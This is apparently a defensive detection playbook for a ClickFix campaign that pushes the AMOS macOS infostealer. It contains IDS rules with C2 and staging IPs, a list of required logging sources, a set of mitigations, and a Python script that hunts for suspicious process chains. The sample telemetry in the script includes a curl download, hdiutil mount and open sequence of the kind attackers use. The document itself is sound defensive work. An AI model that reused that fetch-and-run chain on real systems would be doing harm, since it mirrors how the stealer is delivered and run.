alert tcp $HOME_NET any -> 196.251.107.171 3000 (msg:"ET TROJAN ClickFix AMOS Stealer C2 Connection (196.251.107.171:3000)"; flow:established,to_server; reference:url,github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt; classtype:trojan-activity; sid:2026003; rev:1; metadata:created_at 2026_06_25;)
Attribution: RedSheep Security/Stone (original)
SID 2026004 — Detects outbound connection to 178.16.52.101 — ClickFix AMOS stealer staging IP for DMG download
alert tcp $HOME_NET any -> 178.16.52.101 any (msg:"ET TROJAN ClickFix AMOS Stealer Staging IP (178.16.52.101)"; flow:established,to_server; reference:url,github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt; classtype:trojan-activity; sid:2026004; rev:1; metadata:created_at 2026_06_25;)
Attribution: RedSheep Security/Stone (original)
SID 2026005 — Detects HTTP request containing .dmg file download — potential macOS ClickFix payload delivery
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET POLICY Potential macOS ClickFix DMG Download from Suspicious TLD"; flow:established,to_server; http.uri; content:".dmg"; http.host; pcre:"/\.(beer|top|xyz|info|club|site|online|fun)$/"; classtype:policy-violation; sid:2026005; rev:1; metadata:created_at 2026_06_25;)
Attribution: RedSheep Security/Stone (original)
Data Source Requirements
| Source | Required For | Notes |
|---|---|---|
| Sysmon (Windows) | T1204.002, T1059.001, T1115, T1539 | EventID 1 (Process Create) is critical for process lineage detection. EventID 11 (FileCreate) for credential/cookie file access. EventID 22 (DNS Query) for domain resolution. Ensure Sysmon is deployed with a configuration that captures command-line arguments and parent process information. |
| Windows Security Event Log | T1204.002, T1059.001 | EventID 4688 (Process Creation) with command-line auditing enabled. Ensure 'Include command line in process creation events' GPO is enabled. |
| PowerShell Script Block Logging | T1059.001 | EventID 4104 captures full PowerShell script content. Essential for detecting encoded commands and download cradles. Enable via GPO: Administrative Templates > Windows PowerShell > Turn on PowerShell Script Block Logging. |
| macOS EDR / Endpoint Security Framework | T1059.004, T1555, T1005, T1539 | Requires EDR with macOS process telemetry (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint). Must capture process creation events including parent process, command line, and file access events. osquery can supplement where full EDR is unavailable. |
| macOS Unified Logs | T1059.004, T1555 | Unified logs capture hdiutil, open, and security framework events. Use 'log show' or 'log stream' commands to access. For hunting, forward unified logs to SIEM via syslog or EDR. |
| DNS Logs | T1041, T1059.004 | DNS query logs from internal DNS servers, Sysmon EventID 22, or passive DNS. Critical for detecting lookups to known C2 domains (svs-verificationdate[.]beer, fewfwfwfwfwf[.]info) and identifying connections to suspicious TLDs. |
| Web Proxy / HTTP Logs | T1041, T1115, T1059.004 | Full URL logging including URI paths. Needed to detect DMG downloads from staging servers and connections to fake CAPTCHA/verification pages. SSL inspection recommended for HTTPS traffic. |
| Firewall / NetFlow | T1041 | Perimeter firewall logs and NetFlow/IPFIX data. Critical for detecting connections to known C2 IPs (196.251.107.171:3000, 178.16.52.101). Ensure egress logging is enabled. |
| Zeek/Bro Network Monitoring | T1041 | conn.log, dns.log, http.log, and files.log provide rich network metadata. Zeek's file extraction capability can capture DMG files in transit for analysis. |
Mitigations & Recommendations
Curated baseline: Kimsuky; library archetype
The curated Kimsuky playbook covers spearphishing-driven foothold analysis, persistence hunts, mailbox tampering, browser credential theft, and standard containment (host isolation, password reset, ZAP). It does NOT cover the ClickFix social engineering primitive (user-as-execution-engine via clipboard injection), macOS execution paths (Terminal/curl/hdiutil/DMG), Apple Keychain and crypto wallet theft, browser session cookie theft for session hijacking, or the run-dialog/clipboard paste behavior on Windows.
Established mitigations (curated):
- Isolate compromised host at EDR.
- Reset user password; revoke sessions.
- ZAP/purge the phishing email from all mailboxes.
- Block sender infrastructure (domains, IPs, email patterns).
- Remove any inbox rules or delegate permissions attacker set.
Established detection guidance (curated):
- Review the phishing email: impersonated identity, lure theme, delivery method.
- Identify all recipients of the same lure.
- Check for clickers / attachment executors.
- Endpoint hunt on clickers: LNK execution, macro-doc execution, PowerShell post-click.
- Credential access / browser credential theft hunt (Kimsuky steals browser creds).
- DMARC audit: how well are our own and partner domains' DMARC policies configured (per CISA AA23-271A guidance)?
Net-new from this incident:
- Add a macOS coverage track to the playbook: AMOS/Odyssey stealer artifacts (Keychain, ~/Library/Application Support, hdiutil/DMG mount chains) — the curated playbook is Windows-centric.
- Update user awareness training to specifically warn against pasting commands into Terminal, Run dialog, or PowerShell from web prompts (fake CAPTCHA/verification), which existing phishing training does not cover.
- Treat session cookie theft as a first-class containment concern: always revoke IdP sessions and OAuth refresh tokens on suspected stealer infections, not just rotate passwords.
- Build detections for the 'explorer.exe → powershell.exe' and 'Terminal → curl|hdiutil|open' parent-child chains as high-fidelity ClickFix indicators.
- Note that Kimsuky (TA427) has been observed adopting ClickFix; the curated playbook's phishing-only foothold assumption should be expanded to include browser-lure ClickFix as a Kimsuky delivery vector.
- Revoke all active OAuth/SaaS/M365 session tokens (not just password reset) for impacted users to defeat stolen session cookies. (Why: T1539 — stolen session cookies allow MFA-bypassed access; password reset alone insufficient.)
- On compromised macOS hosts, force Keychain password rotation and revoke any stored OAuth refresh tokens; rotate crypto wallet seeds if wallet files were accessed. (Why: T1555 — AMOS exfiltrates Keychain contents and wallet data.)
- Block C2 IP 196.251.107.171 and associated infrastructure at perimeter and DNS. (Why: T1041 — known AMOS exfiltration endpoint.)
- Deploy browser/endpoint policy to disable or alert on Run dialog (Win+R) command execution patterns and clipboard-paste-to-Terminal on managed macOS endpoints. (Why: T1204.002 / T1115 — interrupt ClickFix user-as-execution mechanic.)
- Detect: Identify whether any user opened the Windows Run dialog (explorer.exe spawning powershell.exe/cmd.exe with no parent document) or macOS Terminal.app shortly after browsing a suspicious page. (Why: T1204.002 / T1059.001 / T1059.004 — ClickFix relies on user pasting attacker commands into Run dialog or Terminal.)
- Detect: Review browser history for fake CAPTCHA, 'verify you are human', or fake error/update overlay pages preceding suspicious shell activity. (Why: T1115 — ClickFix delivery vector is browser-based clipboard hijack via fake prompts.)
- Detect: On macOS endpoints, hunt for hdiutil mount of DMGs downloaded via curl, and subsequent 'open' of apps from /Volumes. (Why: T1059.004 — macOS ClickFix variant uses curl + hdiutil + open to deploy AMOS.)
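The parent/child chains named in the detection items above (Terminal → curl|hdiutil|open, explorer.exe → powershell.exe), as an added example that is not taken from the report or from any vendor: a small Python hunt over constructed EDR-style process events, where the event format, image paths, rule names and hop limit are all assumptions.

```python
import json, re
from collections import defaultdict

# Constructed sample telemetry in a hypothetical JSON-lines shape (pid, ppid,
# image, cmdline); added for this example, not output from any real EDR.
SAMPLE_EVENTS = r"""
{"pid": 100, "ppid": 1, "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal"}
{"pid": 101, "ppid": 100, "image": "/bin/zsh", "cmdline": "-zsh"}
{"pid": 102, "ppid": 101, "image": "/usr/bin/curl", "cmdline": "curl -sL https://verify.example.invalid/v.dmg -o /tmp/v.dmg"}
{"pid": 103, "ppid": 101, "image": "/usr/bin/hdiutil", "cmdline": "hdiutil attach -nobrowse -quiet /tmp/v.dmg"}
{"pid": 104, "ppid": 101, "image": "/usr/bin/open", "cmdline": "open /Volumes/Verify/Verify.app"}
{"pid": 200, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"}
{"pid": 201, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell.exe -NoProfile -w hidden"}
{"pid": 300, "ppid": 1, "image": "/usr/bin/hdiutil", "cmdline": "hdiutil attach /Users/alice/Downloads/Xcode.dmg"}
"""
MAC_LAUNCHER, MAC_STAGE_TOOLS = {"terminal"}, {"curl", "hdiutil", "open"}
WIN_LAUNCHER, WIN_SHELLS = {"explorer.exe"}, {"powershell.exe", "cmd.exe"}
MAX_DEPTH = 4  # Terminal -> zsh -> curl is two hops; allow a couple more

def parse_events(text):
    """Return {pid: event} from JSON-lines process telemetry."""
    return {e["pid"]: e for e in map(json.loads, text.strip().splitlines())}

def basename(image):
    """Lower-cased image file name for both POSIX and Windows paths."""
    return re.split(r"[\\/]", image)[-1].lower()

def has_ancestor(events, pid, names):
    """True if an ancestor within MAX_DEPTH hops has an image name in `names`."""
    cur = events.get(pid)
    for _ in range(MAX_DEPTH):
        cur = events.get(cur["ppid"]) if cur else None
        if cur and basename(cur["image"]) in names:
            return True
    return False

def find_clickfix_chains(events):
    """Per-process hits, plus a high-fidelity macOS finding when one shell ran curl, hdiutil and open on /Volumes."""
    findings, by_shell = [], defaultdict(set)
    for pid, ev in events.items():
        name, parent = basename(ev["image"]), events.get(ev["ppid"])
        if name in MAC_STAGE_TOOLS and has_ancestor(events, pid, MAC_LAUNCHER):
            findings.append({"rule": "terminal_to_stage_tool", "pid": pid, "tool": name})
            by_shell[ev["ppid"]].add(name)  # group by the interactive shell that spawned it
        if name in WIN_SHELLS and parent and basename(parent["image"]) in WIN_LAUNCHER:
            findings.append({"rule": "explorer_to_shell", "pid": pid, "tool": name})
    for shell_pid, tools in by_shell.items():
        opened = any(basename(e["image"]) == "open" and "/Volumes/" in e["cmdline"]
                     for e in events.values() if e["ppid"] == shell_pid)
        if tools >= MAC_STAGE_TOOLS and opened:  # full curl + hdiutil + open chain
            findings.append({"rule": "curl_hdiutil_open_chain", "pid": shell_pid,
                             "tool": basename(events[shell_pid]["image"])})
    return findings
```

The standalone hdiutil event (pid 300, no Terminal ancestor) is deliberately left unflagged, since Finder- or launchd-driven DMG mounts are routine on a developer workstation.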
Sources
- BleepingComputer - New macOS ClickFix attack silently mounts DMGs to push infostealer
- Proofpoint - Clipboard Compromise: PowerShell Self-Pwn (ClickFix initial documentation)
- Proofpoint - Around the World in 90 Days: State-Sponsored Actors Try ClickFix
- Unit 42 (Palo Alto Networks) - ClickFix campaign delivers macOS infostealer via DMG (Timely Threat Intel)